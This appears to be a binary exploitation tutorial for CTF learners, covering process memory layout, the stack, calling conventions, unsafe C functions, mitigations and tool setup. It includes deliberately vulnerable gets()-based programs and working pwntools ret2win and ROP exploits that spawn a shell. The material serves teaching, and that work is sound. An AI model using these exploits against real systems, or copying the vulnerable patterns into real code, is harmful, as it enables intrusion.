1 // Memory Layout of a Process
Before you exploit anything, you need to know where things live in memory. When you run ./program, the kernel doesn't just dump the binary into RAM — it carves out a structured address space with five distinct regions, each with its own rules.
The Five Regions
What Lives Where
| Region | Permissions | What's Stored | Why Exploiters Care |
|---|---|---|---|
| .text | R-X (read+exec) | Compiled machine code | Target for ret2win, source of ROP gadgets |
| .data | RW- | Initialized globals (int x = 5;) | Sometimes contains writable function pointers |
| .bss | RW- | Uninitialized globals (int x;) | Often used as scratch space for shellcode |
| Heap | RW- | malloc() chunks | Heap exploitation (UAF, double-free, etc.) |
| Stack | RW- (or RWX if NX off) | Local vars, saved registers, return addresses | ★ The main playground for stack exploitation |
See It Yourself
Compile this and run it — you'll see exactly where every variable lives:
#include <stdio.h>
#include <stdlib.h>
int global_init = 42; // .data
int global_uninit; // .bss
char *str = "hello"; // pointer in .data, string in .rodata
void func() {} // .text
int main() {
int local = 7; // stack
int *heap = malloc(4); // heap
printf(".text func : %p\n", func);
printf(".data global : %p\n", &global_init);
printf(".bss global : %p\n", &global_uninit);
printf("heap ptr : %p\n", heap);
printf("stack local : %p\n", &local);
}
.text func : 0x401136
.data global : 0x404010
.bss global : 0x404020
heap ptr : 0x21cb2a0
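stack local : 0x7fffffffe2cc
Notice how stack addresses are huge (they start with 0x7fff...) and code addresses are tiny (0x4011...). That is the typical layout for a non-PIE binary on 64-bit Linux. A PIE binary loads its code at a high base instead (0x5555... under GDB), which is what you'll see in the maps output further down.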
View the Map at Runtime
Linux exposes the live memory map of every process via /proc/[pid]/maps:
# In one terminal: run a program that hangs
$ ./program &
[1] 12345
# In another terminal:
$ cat /proc/12345/maps
555555554000-555555555000 r--p ... /home/user/program # ELF headers (read-only)
555555555000-555555556000 r-xp ... /home/user/program # .text
555555556000-555555557000 r--p ... /home/user/program # .rodata
555555557000-555555558000 rw-p ... /home/user/program # .data + .bss
7ffff7d8b000-7ffff7db3000 r--p ... /lib/x86_64-linux-gnu/libc.so.6
7ffff7fbe000-7ffff7fbf000 rw-p ... [stack] # THE STACK
In pwndbg, the same info comes from vmmap. Memorize that command — you'll use it constantly.
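If you'd rather script the lookup than eyeball it, a maps line is easy to parse. This is a minimal sketch, assuming the standard kernel line format (`start-end perms offset dev inode [path]`); the `Mapping` type, the `parse_maps_line` helper, and the sample line are made up for illustration.

```python
from typing import NamedTuple

class Mapping(NamedTuple):
    start: int
    end: int
    perms: str
    path: str

def parse_maps_line(line: str) -> Mapping:
    """Parse one /proc/<pid>/maps line: 'start-end perms offset dev inode [path]'."""
    fields = line.split(maxsplit=5)
    start, end = (int(x, 16) for x in fields[0].split("-"))
    path = fields[5].strip() if len(fields) > 5 else ""   # anonymous mappings have no path
    return Mapping(start, end, fields[1], path)

# Illustrative line in the full kernel format (not taken from a real run).
sample = "555555555000-555555556000 r-xp 00001000 08:01 1234567 /home/user/program"
m = parse_maps_line(sample)
print(hex(m.start), m.perms, m.path, "size:", hex(m.end - m.start))

def executable_regions(text: str):
    """Return every mapping that has the x bit set."""
    return [r for r in map(parse_maps_line, text.splitlines()) if "x" in r.perms]
```

On a Linux box you can feed it the real thing with `executable_regions(open("/proc/self/maps").read())`.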
2 // The Stack — Deep Dive
The stack is where 95% of beginner-level binary exploitation happens. If you only deeply understand one data structure for pwn, make it this one.
What the Stack Actually Is
The stack is a region of memory that grows downward (toward lower addresses) and is managed by two CPU registers:
- RSP — Stack Pointer. Always points to the top of the stack (lowest currently-used address).
- RBP — Base Pointer. Points to the base of the current function's frame.
Function Prologue and Epilogue
Most C functions compiled without optimization on x86-64 start with the same 2-3 instructions and end with the same 2. These are the prologue and epilogue.
push rbp ; save caller's base pointer onto stack
mov rbp, rsp ; new frame: rbp points to top of saved area
sub rsp, 0x40 ; allocate 64 bytes for local variables
leave ; mov rsp, rbp ; pop rbp (undo the prologue)
ret ; pop the return address into rip — JUMPS BACK
That last instruction — ret — is the entire reason buffer overflow exploitation works. ret blindly pops 8 bytes off the stack into RIP and jumps there. If you control those 8 bytes, you control program execution.
Anatomy of a Stack Frame (x86-64)
The buffer sits at the bottom (lowest address). To reach the return address, you write upward — past the end of the buffer, past saved RBP, into saved RIP. That's a buffer overflow.
What CALL and RET Actually Do
These two instructions are the heartbeat of every exploit. Memorize their exact behavior:
| Instruction | What it does | Pseudo-code |
|---|---|---|
| call addr | Push return address, jump | push next_rip; rip = addr |
| ret | Pop 8 bytes, jump there | rip = pop() |
| push X | Decrement RSP by 8, write X | rsp -= 8; *rsp = X |
| pop X | Read 8 bytes, increment RSP | X = *rsp; rsp += 8 |
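To make the table concrete, here is a toy model of those four instructions. It is only a sketch: `TinyCPU` is a made-up class, memory is a dictionary of 8-byte slots, and the addresses are placeholders.

```python
class TinyCPU:
    """Toy model of RSP, RIP and a sparse stack made of 8-byte slots."""

    def __init__(self, rsp=0x7FFFFFFFE000, rip=0x401000):
        self.rsp, self.rip, self.mem = rsp, rip, {}

    def push(self, value):
        self.rsp -= 8                 # stack grows toward lower addresses
        self.mem[self.rsp] = value

    def pop(self):
        value = self.mem[self.rsp]
        self.rsp += 8
        return value

    def call(self, target, insn_len=5):
        self.push(self.rip + insn_len)  # return address = instruction after the call
        self.rip = target

    def ret(self):
        self.rip = self.pop()           # no checks at all: whatever is there wins

cpu = TinyCPU()
cpu.call(0x401136)             # a 5-byte call sitting at 0x401000
slot = cpu.rsp                 # the return address lives here now
print(hex(cpu.mem[slot]))      # 0x401005
cpu.mem[slot] = 0x401196       # simulate an overflow clobbering that slot
cpu.ret()
print(hex(cpu.rip))            # 0x401196
```

The last two lines are the whole idea of a stack overflow: ret has no way to tell the original return address from the one you wrote.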
Trace Through a Real Function
void greet() {
char buf[16];
gets(buf); // read user input
}
int main() {
greet();
return 0;
}
When main calls greet(), here's exactly what's on the stack at the moment gets() is about to read input:
The buffer is 16 bytes. To overwrite the return address, you'd need to write 16 bytes of padding + 8 bytes of saved RBP = 24 bytes of garbage, then your target address as bytes 25-32. That's it. That's the exploit.
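The arithmetic above can be written out with nothing but the standard library. This is a sketch under two assumptions: the compiler put no padding between buf and saved RBP, and `target` is a placeholder address rather than anything from a real binary.

```python
import struct

BUF_SIZE = 16        # char buf[16] in greet()
SAVED_RBP = 8        # saved base pointer sits right above the buffer
target = 0x401136    # hypothetical address to return to

payload = b"A" * BUF_SIZE                 # fills the buffer
payload += b"B" * SAVED_RBP               # overwrites saved RBP with garbage
payload += struct.pack("<Q", target)      # bytes 25-32: the new return address

print(len(payload))          # 32
print(payload[24:].hex())    # 3611400000000000 (little-endian)
```

Note the byte order: x86-64 is little-endian, so the lowest byte of the address goes first.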
The Famous Diagram (memorize this)
Once you have this diagram in your head, every stack BOF exploit looks the same: padding + filler for RBP + your target. The only difference between challenges is what the target is.
3 // Calling Conventions
Every time a function is called, the CPU follows a strict contract about where arguments go and where the return value ends up. That contract is the calling convention, and it changes between 32-bit and 64-bit Linux. You have to know both.
x86-64 System V ABI (64-bit Linux)
This is what you'll deal with on every modern Linux CTF challenge.
| Argument | Register |
|---|---|
| 1st arg | RDI |
| 2nd arg | RSI |
| 3rd arg | RDX |
| 4th arg | RCX |
| 5th arg | R8 |
| 6th arg | R9 |
| 7th+ args | Stack (right-to-left) |
| Return value | RAX |
Memory aid: "Diane's Silk Dress Cost $89" → RDI, RSI, RDX, RCX, R8, R9.
x86 cdecl (32-bit Linux)
32-bit is simpler — and slower. All arguments go on the stack, pushed right-to-left.
push 3 ; 3rd arg first
push 2 ; 2nd arg
push 1 ; 1st arg last (so it's on top of stack)
call foo ; pushes return addr, jumps to foo
add esp, 12 ; caller cleans up the 3 args
Return value is in EAX. Inside foo, args are accessed as [ebp+8], [ebp+12], [ebp+16].
Why This Matters For Exploitation
Different calling conventions = different exploit shapes:
32-bit ret2libc — easy mode
In 32-bit, args go on the stack. So to call system("/bin/sh"), you place system's address, then a fake return address, then a pointer to "/bin/sh", all on the stack:
[ padding ][ saved EBP ][ &system ][ fake_ret ][ &"/bin/sh" ]
That's it. No gadgets needed.
64-bit ret2libc — needs gadgets
In 64-bit, the first arg has to be in RDI, not on the stack. There's no instruction in system() that loads RDI from the stack — so you need a gadget: a tiny snippet of code somewhere in the binary that does pop rdi ; ret. You stack:
[ padding ][ &'pop rdi; ret' ][ &"/bin/sh" ][ &system ]
The gadget pops "/bin/sh" into RDI, then returns into system. This is your first ROP chain.
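Side by side, the two layouts look like this in code. It's a rough sketch: every address is a made-up placeholder, `p32`/`p64` are local helpers written to mimic the pwntools functions of the same name, and `offset` means the number of bytes up to the saved return address (so it already includes the saved base pointer).

```python
import struct

def p32(value: int) -> bytes:
    return struct.pack("<I", value)

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Placeholder addresses, for illustration only.
SYSTEM_32, BINSH_32 = 0xF7E12420, 0xF7F5A0CF
SYSTEM_64, BINSH_64, POP_RDI = 0x7FFFF7E1A290, 0x7FFFF7F6C5BD, 0x401333

def ret2libc_32(offset: int) -> bytes:
    # system() finds its return address first, then its argument, on the stack
    return b"A" * offset + p32(SYSTEM_32) + b"RETN" + p32(BINSH_32)

def ret2libc_64(offset: int) -> bytes:
    # the gadget moves the pointer from the stack into RDI before system() runs
    return b"A" * offset + p64(POP_RDI) + p64(BINSH_64) + p64(SYSTEM_64)

print(len(ret2libc_32(44)), len(ret2libc_64(72)))   # 56 96
```

Same goal, different shape: the 32-bit payload is pure data, the 64-bit one needs one piece of borrowed code.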
System Calls vs Function Calls
Tricky detail that bites everyone once: syscalls use a different register for the 4th argument than function calls.
| Call type | 4th arg | Why |
|---|---|---|
| Function call | RCX | Standard System V ABI |
| Syscall | R10 | The syscall instruction itself clobbers RCX |
So if you're writing shellcode that uses raw syscalls (like execve), the args go: RAX=syscall#, RDI, RSI, RDX, R10, R8, R9.
Cheat Sheet
// 64-bit function call:
rdi, rsi, rdx, rcx, r8, r9 → return in rax
// 64-bit syscall:
rax=#, rdi, rsi, rdx, r10, r8, r9 → return in rax
// 32-bit function call (cdecl):
all args on stack, pushed right-to-left → return in eax
// 32-bit syscall:
eax=#, ebx, ecx, edx, esi, edi, ebp → return in eax
4 // Vulnerable C Functions — The Hall of Shame
Every BOF exploit starts with a developer using one of a small set of "dangerous" C functions. Memorize this list. When you open a binary in Ghidra and see one of these, you've found your vulnerability.
The Big Five
gets() — the king of crimes
gets(buf) reads from stdin until newline, with no bounds check. There is literally no safe way to use it. The C standard removed it in C11 — but compiled binaries still have it.
char buf[16];
gets(buf); // user types 1000 chars → 984 bytes overflow
Safer: fgets(buf, sizeof(buf), stdin).
strcpy() / strcat()
Copy / concatenate strings until the source's null byte. No size check.
char dest[8];
strcpy(dest, argv[1]); // argv[1] could be 1MB — boom
Safer: strncpy(dest, src, sizeof(dest)-1) + manual null-terminate, or snprintf.
sprintf()
Like printf but writes to a buffer. No size limit on the formatted output.
char buf[32];
sprintf(buf, "Hello, %s!", argv[1]); // argv[1] is 100 chars → overflow
Safer: snprintf(buf, sizeof(buf), ...).
scanf("%s", ...) — silent killer
Looks innocent. Without a width specifier, %s reads until whitespace with no bounds check.
char buf[16];
scanf("%s", buf); // vulnerable!
scanf("%15s", buf); // safe — width specifier matches buf size-1
read() / fread() with wrong size
These functions do take a size — but developers get it wrong:
char buf[16];
read(0, buf, 100); // reads up to 100 bytes into a 16-byte buffer
char *p = buf;
read(0, p, sizeof(p)); // sizeof a pointer = 8, not the buffer size
Always check that the read size matches the actual buffer size, not sizeof(pointer).
Format String Family
These don't cause buffer overflows directly, but if user input reaches them as the format argument, you get an arbitrary memory read/write primitive (Chapter 17):
// VULNERABLE — user controls the format string
printf(user_input);
fprintf(fp, user_input);
sprintf(buf, user_input);
syslog(LOG_INFO, user_input);
// SAFE — format string is a literal
printf("%s", user_input);
Quick Audit Workflow
When you get a new binary, the first thing you do is grep for these:
# Look for dangerous imports
$ objdump -d ./vuln | grep -E "call.*<(gets|strcpy|strcat|sprintf|scanf|system|exec)"
# Or in pwntools
>>> e = ELF('./vuln')
>>> 'gets' in e.symbols # True = jackpot
>>> e.symbols['win'] # address of win() if it exists
5 // Your First Buffer Overflow
Time to actually crash a program and look at what happened. This is the "oh, that's it?" moment that turns binexp from scary to obvious.
The Vulnerable Program
#include <stdio.h>
void vuln() {
char buf[64];
printf("Give me input: ");
gets(buf); // the bug
printf("You said: %s\n", buf);
}
int main() {
vuln();
return 0;
}
gcc -fno-stack-protector -no-pie -z execstack -o vuln vuln.c
The compiler will warn you about gets. That's fine — we're doing this on purpose.
Step 1: Crash It
$ ./vuln
Give me input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
You said: AAAA...AAAA
Segmentation fault (core dumped)
Congratulations — you just exploited your first program. The crash means the saved return address got overwritten with 0x4141414141414141 (eight ASCII 'A's). When ret tried to send the CPU to that address, there was nothing valid there, and the kernel killed your process.
Step 2: Confirm in GDB
$ gdb -q ./vuln
pwndbg> run
<<< paste 80 'A's at the prompt >>>
Program received signal SIGSEGV, Segmentation fault.
RAX 0x0
RIP 0x4141414141414141 ← we own this register
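*RSP 0x7fffffffe2e8 ◂— ...
RIP is now 0x4141.... That's not just a crash — that's arbitrary control over execution flow. Whatever 8 bytes you put at the right offset become the address of the next instruction the CPU jumps to. (On some setups the debugger stops on the ret itself, with RIP still inside vuln() and the 'A's sitting at the top of the stack, because 0x4141414141414141 is not a canonical x86-64 address. Check with x/gx $rsp; the conclusion is the same.)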
Step 3: How Did It Happen?
Here's the stack layout for the vuln() function:
Send 72 bytes of garbage and then 8 bytes of address — those 8 bytes become the new RIP.
The Mental Model You Need
The Word "Offset"
You'll hear "offset to RIP" 1000 times. It just means: the number of bytes from the start of your input to where the saved return address sits. In this example it was 72. You'll use a tool to find it automatically next chapter.
Things That Will Stop You (For Now)
Modern compilers turn on protections that make this trivial example fail. Until we cover bypasses, compile with these flags so things work:
| Flag | What it disables | Why we want it off |
|---|---|---|
| -fno-stack-protector | Stack canary | Canary detects overflow → process aborts |
| -no-pie | Position-Independent Executable | So function addresses are static and predictable |
| -z execstack | NX bit | So we can run shellcode on the stack later |
| echo 0 > /proc/sys/kernel/randomize_va_space | ASLR (system-level) | So stack/libc addresses don't randomize |
Once you've got the basics down, we'll turn each protection back on and learn how to defeat it.
6 // Cyclic Patterns — Finding the Offset
You don't want to send 8 'A's, then 16, then 24, manually narrowing in on where RIP overflow starts. There's a 3-second tool for that, based on a beautiful piece of math called a De Bruijn sequence.
The Idea
A De Bruijn sequence is a string where every possible substring of length N appears exactly once. Pwntools' cyclic generates these for you. When the program crashes, you read the value in RIP, look it up in the sequence, and you instantly know the offset.
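If you're curious what's under the hood, the sequence is short to generate yourself. The sketch below uses the standard recursive construction over the lowercase alphabet with N = 4; `de_bruijn`, `pattern` and `find_offset` are names invented here, not the pwntools API, though the output starts the same way as the pattern shown in the next section.

```python
import itertools
import string
import struct

def de_bruijn(alphabet: str, n: int):
    """Lazily yield a de Bruijn sequence over `alphabet` for substrings of length n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def pattern(length: int, n: int = 4) -> bytes:
    chars = itertools.islice(de_bruijn(string.ascii_lowercase, n), length)
    return "".join(chars).encode()

def find_offset(needle, length: int = 1024, n: int = 4) -> int:
    """Offset of the first n bytes of `needle` in the pattern, or -1 if absent."""
    if isinstance(needle, int):
        needle = struct.pack("<Q", needle)   # register values are little-endian
    return pattern(length, n).find(needle[:n])

print(pattern(20))                # b'aaaabaaacaaadaaaeaaa'
print(pattern(200)[72:80])        # b'saaataaa'
print(find_offset(b"saaataaa"))   # 72
```

Because every 4-byte window is unique, the first four bytes of whatever lands in the register are enough to pin down the offset.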
Generate
$ cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaa...
Now feed that into your crashing program:
$ gdb -q ./vuln
pwndbg> run < <(cyclic 200)
...
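RIP 0x6161617461616173 ← look at this!
Look It Up
$ cyclic -l 0x6161617461616173
72
Done. Offset to RIP is 72 bytes. Took 3 commands. No guessing. If RIP still points at the ret instead of showing pattern bytes, take the 8 bytes at the top of the stack (x/gx $rsp) and look those up instead.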
32-bit Patterns
For 32-bit binaries, the instruction pointer (EIP) is only 4 bytes:
$ cyclic -l 0x6161616f # 4-byte chunk
56
Pwntools' Python API does the same:
>>> from pwn import *
>>> cyclic(200)
b'aaaabaaacaaadaaa...'
>>> cyclic_find(0x6161617461616173)
72
>>> cyclic_find(b'saaa')
72
Inside pwndbg
Pwndbg builds it in:
pwndbg> cyclic 200 # generates pattern
pwndbg> cyclic -l $rip # looks up current RIP value
Why Not Just Brute-Force?
You could send 100 'A's, then 200, then 300, and binary-search. People do this. But:
- Cyclic gives you the answer in one run.
- It works even if the offset is weird (like 73, not a multiple of 8).
- It's the standard — every CTF writeup will use it.
Practice It
Right now, fire up your VM, compile vuln.c from chapter 5, run it under GDB with a cyclic input, and find the offset. Don't read on until you've done it. Muscle memory matters.
7 // Exploit Mitigations & checksec
Modern binaries ship with multiple defenses. Each one blocks a specific class of exploit. checksec tells you which are on. Reading its output is the first thing you do on any new binary.
RELRO STACK CANARY NX PIE
Full RELRO Canary found NX enabled PIE enabled
The Five Defenses
NX / DEP — No-eXecute
What it does: Marks the stack and heap as non-executable. The CPU refuses to run instructions from those regions.
What it blocks: Classic shellcode injection. You can no longer write shellcode to the stack and jump to it.
How to bypass: Don't inject new code. Reuse code that's already in the binary or libc — that's ROP and ret2libc.
Disable for testing: gcc -z execstack
Stack Canary — overflow detector
What it does: Compiler inserts a random 8-byte value between local variables and saved RBP. Before ret, it checks the canary is unchanged. If it's been overwritten, the program calls __stack_chk_fail and dies.
What it blocks: Naive stack overflows that overwrite RIP. The canary sits between buf and RIP — any overflow has to clobber it.
How to bypass: 1. Leak it via format string or another bug, then include the correct value in your payload. 2. Brute-force it (only on forking servers where the child inherits the parent's canary). 3. Skip it by overwriting via a non-stack vulnerability (heap, GOT, etc.).
Disable: gcc -fno-stack-protector
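Bypass 1 changes the payload shape only slightly: you write the canary's own value back over itself. A minimal sketch, assuming you already have a leak; the distance to the canary, the leaked value and the target address are all hypothetical, and `payload_with_canary` is a helper invented for this example.

```python
import struct

def payload_with_canary(buf_to_canary: int, canary: int, target: int) -> bytes:
    """Padding up to the canary, the leaked canary, 8 bytes for saved RBP, new return address."""
    return (
        b"A" * buf_to_canary
        + struct.pack("<Q", canary)     # put the right value back so the check passes
        + b"B" * 8                      # saved RBP, garbage is fine here
        + struct.pack("<Q", target)
    )

leaked = 0x5A3C91E2D7F4B600   # hypothetical leak; glibc canaries on x86-64 end in a zero byte
payload = payload_with_canary(72, leaked, 0x401196)
print(len(payload))           # 96
```

That zero low byte is deliberate: it stops string functions like strcpy from copying a canary out or writing one past it in a single pass.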
PIE — Position Independent Executable
What it does: The binary itself is loaded at a random base address each run. Function addresses inside the binary are unpredictable.
What it blocks: Naive ret2win. You can't hardcode 0x401234 if the base changes.
How to bypass: Leak any one address from the binary at runtime (via format string, info-leak bug, or partial overwrite). Subtract its known offset from the symbol to get the base. Add the base to any other symbol's offset to get its real address.
Disable: gcc -no-pie
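The base calculation is two lines of arithmetic. Here is a sketch with invented numbers: `rebase` is a hypothetical helper, and the offsets stand in for what you would read out of the binary's symbol table.

```python
def rebase(leaked_addr: int, leaked_symbol_offset: int, wanted_symbol_offset: int) -> int:
    """Turn one leaked runtime address into the runtime address of another symbol."""
    base = leaked_addr - leaked_symbol_offset
    if base & 0xFFF:
        # load bases are page-aligned; anything else means a bad leak or wrong symbol
        raise ValueError(f"suspicious base {base:#x}")
    return base + wanted_symbol_offset

# Hypothetical: main is at offset 0x1249 in the file, win at 0x1196,
# and the program leaked main's runtime address.
win = rebase(0x555555555249, 0x1249, 0x1196)
print(hex(win))   # 0x555555555196
```

The page-alignment check is cheap insurance: if the low 12 bits of your computed base are not zero, stop and recheck the leak before sending anything.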
ASLR — Address Space Layout Randomization
What it does: Kernel-level. Randomizes stack base, libc base, heap base on every execution.
What it blocks: Hardcoded shellcode addresses, hardcoded libc addresses.
How to bypass: Same as PIE — leak any libc address (via puts(puts@got) trick), calculate libc base, then anything in libc is yours.
Disable system-wide: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Disable in GDB only: set disable-randomization on (this is already GDB's default, so it applies in pwndbg too).
RELRO — Read-Only Relocations
What it does: Makes the GOT (Global Offset Table) read-only after the dynamic linker has resolved all imports.
- No RELRO — GOT writable always. Easy GOT overwrite.
- Partial RELRO — the non-PLT part of the GOT is read-only, but .got.plt stays writable for lazy binding. GOT overwrite of imported functions still works.
- Full RELRO — all imports resolved at startup, GOT entirely read-only. GOT overwrite impossible.
How to bypass: If Full RELRO, find another writable function pointer (like __free_hook in heap exploitation on glibc older than 2.34, or a custom function table).
Disable: gcc -z norelro or -Wl,-z,norelro
Quick Reference Matrix
| Mitigation | Blocks | Defeated By |
|---|---|---|
| NX | Stack shellcode | ROP / ret2libc |
| Canary | Naive stack BOF | Leak the canary |
| PIE | Hardcoded binary addrs | Leak any binary addr |
| ASLR | Hardcoded libc/stack addrs | Leak any libc addr |
| Full RELRO | GOT overwrite | Different write target |
The Strategy Question
When you run checksec and see all five protections enabled, your strategy is fixed:
- Find an info-leak bug (or use the BOF itself as one).
- Leak a libc address → defeats ASLR.
- Leak the canary → defeats canary.
- Leak a binary address → defeats PIE.
- Now build a ROP chain to system("/bin/sh").
Every "all protections on" challenge is some variation of these five steps.
8 // Tool Setup — Install Everything
This is the chapter you reference forever. Install these once on a fresh Ubuntu 22.04 VM and you're set for every challenge in this course (and every CTF you'll ever do).
System Prep
sudo apt update && sudo apt upgrade -y
sudo apt install -y build-essential gcc-multilib g++-multilib \
python3 python3-pip python3-dev git curl wget vim \
net-tools binutils elfutils ruby-full
1. pwntools — your exploit framework
python3 -m pip install --upgrade pwntools
Verify:
$ python3 -c "from pwn import *; print(context)"
ContextType(arch='i386', bits=32, ...)
2. pwndbg — GDB on steroids
Pick one of pwndbg / GEF / PEDA. We use pwndbg in this course. It's the most actively maintained and best for pwn.
git clone https://github.com/pwndbg/pwndbg ~/pwndbg
cd ~/pwndbg
./setup.sh
Verify:
$ gdb
pwndbg> # prompt should say "pwndbg" not "(gdb)"
Alternatives: GEF and PEDA
GEF — modern, Python-based, similar features to pwndbg:
bash -c "$(curl -fsSL https://gef.blah.cat/sh)"
PEDA — older, still works, lighter:
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
You can only have one active at a time. Switch by editing ~/.gdbinit.
3. checksec — protection inspector
wget https://raw.githubusercontent.com/slimm609/checksec.sh/master/checksec
chmod +x checksec
sudo mv checksec /usr/local/bin/
4. Ropper — gadget hunter (Python)
python3 -m pip install ropper
5. ROPgadget — alternative gadget hunter
python3 -m pip install ropgadget
Why both? Each finds slightly different gadgets. When one fails to find what you need, try the other.
6. one_gadget — magic addresses for ret2libc
sudo gem install one_gadget
Verify:
$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0xebc81 execve("/bin/sh", r15, rdx)
constraints: ...
7. patchelf + pwninit — libc swap helpers
sudo apt install patchelf
# pwninit needs Rust
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
cargo install pwninit
8. Disassembler — Ghidra
Ghidra is free and the standard tool used in this course. Download from ghidra-sre.org.
# Java prerequisite
sudo apt install -y openjdk-17-jdk
# Run
cd ~/ghidra_*
./ghidraRun
Alternatives:
- IDA Free — also free, slightly nicer UI, no decompiler in free version.
- Binary Ninja — paid (~$300), excellent decompiler, scriptable.
- Cutter — radare2 frontend, free.
- Hopper — paid, macOS/Linux.
- radare2 — covered in the RE course.
9. Helpers (already on system)
| Tool | What you'll use it for |
|---|---|
| file | 32-bit or 64-bit? Stripped? |
| strings | Find hardcoded strings (passwords, paths, "/bin/sh") |
| ldd | Which libc does this binary need? |
| readelf -a | Sections, symbols, GOT, dynamic info |
| objdump -d -M intel | Disassembly in Intel syntax |
| nm | Symbols (won't work on stripped binaries) |
| xxd / hexdump -C | Look at raw bytes |
10. One-Shot Verification
Run all of this. If any line errors, fix it before moving on:
checksec --version
ropper --version
ROPgadget --version
one_gadget --version
patchelf --version
python3 -c "import pwn; print('pwntools', pwn.__version__)"
gdb --version | head -1
gcc --version | head -1
Bonus: ~/.gdbinit Setup
Drop this in ~/.gdbinit for sane defaults:
set disassembly-flavor intel
set disable-randomization on
set follow-fork-mode parent
set pagination off
set history save on
set history size 10000
set history filename ~/.gdb_history
source ~/pwndbg/gdbinit.py
9 // Ret2Win — Your First Real Exploit
This is the "Hello World" of binary exploitation. The binary has a hidden function that, if called, prints the flag (or gives a shell). Your job: hijack execution and call it.
The Vulnerable Program
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void win() {
printf("Congrats! You called win()\n");
system("/bin/sh");
}
void vuln() {
char buf[64];
printf("Input: ");
gets(buf);
}
int main() {
vuln();
return 0;
}
gcc -fno-stack-protector -no-pie -o ret2win ret2win.c
The Plan
- Find the offset to RIP using cyclic.
- Find the address of win.
- Build payload: [ padding ][ &win ].
- Send it. Get shell.
Step 1: Find the Offset
$ gdb -q ./ret2win
pwndbg> run
<<< cyclic 200 >>>
RIP 0x6161617461616173
pwndbg> cyclic -l 0x6161617461616173
72
Step 2: Find win()
$ objdump -d ret2win | grep "<win>:"
0000000000401196 <win>:
Or in pwntools:
>>> e = ELF('./ret2win')
>>> hex(e.symbols['win'])
'0x401196'
Step 3: The Exploit
from pwn import *
exe = ELF("./ret2win")
context.binary = exe
p = process("./ret2win")
offset = 72
win_addr = exe.symbols["win"]
payload = b"A" * offset
payload += p64(win_addr)
p.sendlineafter(b"Input: ", payload)
p.interactive()
$ python3 solve.py
[+] Starting local process './ret2win': pid 12345
Congrats! You called win()
$ id
uid=1000(user) ...
That's it. That's a working exploit. Now let's break down what every line did.
What Just Happened
When vuln() hits its ret instruction, it pops 8 bytes off the stack. Those 8 bytes are now 0x401196 (win's address). RIP becomes that, and the next instruction the CPU runs is the start of win().
The Stack Alignment Gotcha (64-bit)
Here's a trap that catches everyone. On 64-bit, calling system() sometimes crashes with a SIGSEGV in movaps instead of giving you a shell. That's because the System V ABI requires 16-byte stack alignment at function call boundaries.
When your ROP chain enters system(), RSP often isn't 16-byte aligned (because we skipped the normal CALL instruction). The fix is a ret gadget — one extra ret in the chain to align the stack:
payload = b"A" * 72
payload += p64(ret_gadget) # aligns the stack
payload += p64(win_addr)
Find a ret gadget with:
$ ROPgadget --binary ret2win | grep ": ret"
0x000000000040101a : ret
If your win() doesn't internally call system(), you don't need this. But once you start doing ret2libc, this gadget is your best friend.
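You can check the alignment argument with plain arithmetic. After a normal call, RSP is 8 modulo 16 at the first instruction of the callee, because the call pushed one 8-byte return address onto an aligned stack. The sketch below tracks RSP through the hijacked return; the slot address is a placeholder and `rsp_at_entry` is a made-up helper.

```python
def rsp_at_entry(return_slot: int, extra_rets: int) -> int:
    """RSP when the final target starts running: vuln's ret plus any extra ret gadgets."""
    rsp = return_slot
    for _ in range(1 + extra_rets):   # every ret pops 8 bytes
        rsp += 8
    return rsp

slot = 0x7FFFFFFFE2E8   # hypothetical address of the saved return address (8 mod 16)
for extra in (0, 1):
    rsp = rsp_at_entry(slot, extra)
    status = "as after a real call" if rsp % 16 == 8 else "misaligned"
    print(extra, hex(rsp), status)
```

With no extra gadget the target starts at RSP = 0 mod 16, which is 8 bytes off from what compiled code expects; one bare ret shifts it back.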
10 // Ret2Win With Arguments
Same idea as last chapter, but now the win function checks its arguments. You can't just jump to it — you have to control the arguments too. This is your first taste of controlling registers, which is what every 64-bit exploit does.
The Vulnerable Program
void win(int a, int b) {
if (a == 0xdeadbeef && b == 0xc0debabe) {
printf("You win!\n");
system("/bin/sh");
} else {
printf("Wrong args.\n");
}
}
void vuln() {
char buf[64];
gets(buf);
}
int main() { vuln(); return 0; }
The Problem
x86-64 calling convention says: 1st arg in RDI, 2nd arg in RSI. We need RDI = 0xdeadbeef and RSI = 0xc0debabe before win runs.
The stack overflow only lets us write to memory. We need to write to registers. The trick: find a tiny piece of code that does write to registers from the stack, then use it.
Enter Gadgets
A gadget is a sequence of instructions ending in ret that you find inside the existing binary. The classic ones:
pop rdi
ret
This pops 8 bytes off the stack into RDI, then returns. If you put RDI's desired value on the stack before the ret target, this gadget will load it for you.
Find the Gadgets
$ ROPgadget --binary ret2win_args | grep ": pop rdi ; ret"
0x0000000000401333 : pop rdi ; ret
$ ROPgadget --binary ret2win_args | grep ": pop rsi ; ret"
0x0000000000401331 : pop rsi ; pop r15 ; ret # note the extra pop!
Notice pop rsi often comes paired with pop r15. That's fine — we just have to put 8 bytes of garbage on the stack to feed r15.
Build the Chain
The Exploit
from pwn import *
exe = ELF("./ret2win_args")
context.binary = exe
p = process(exe.path)
pop_rdi = 0x0000000000401333 # pop rdi ; ret
pop_rsi_r15 = 0x0000000000401331 # pop rsi ; pop r15 ; ret
win_addr = exe.symbols["win"]
payload = b"A" * 72
payload += p64(pop_rdi)
payload += p64(0xdeadbeef)
payload += p64(pop_rsi_r15)
payload += p64(0xc0debabe)
payload += p64(0x4141414141414141) # r15 garbage
payload += p64(win_addr)
p.sendline(payload)
p.interactive()
Pwntools' ROP Helper
Pwntools has a ROP object that does this for you:
from pwn import *
exe = ELF("./ret2win_args")
rop = ROP(exe)
rop.win(0xdeadbeef, 0xc0debabe) # auto-builds the chain!
print(rop.dump()) # show the chain
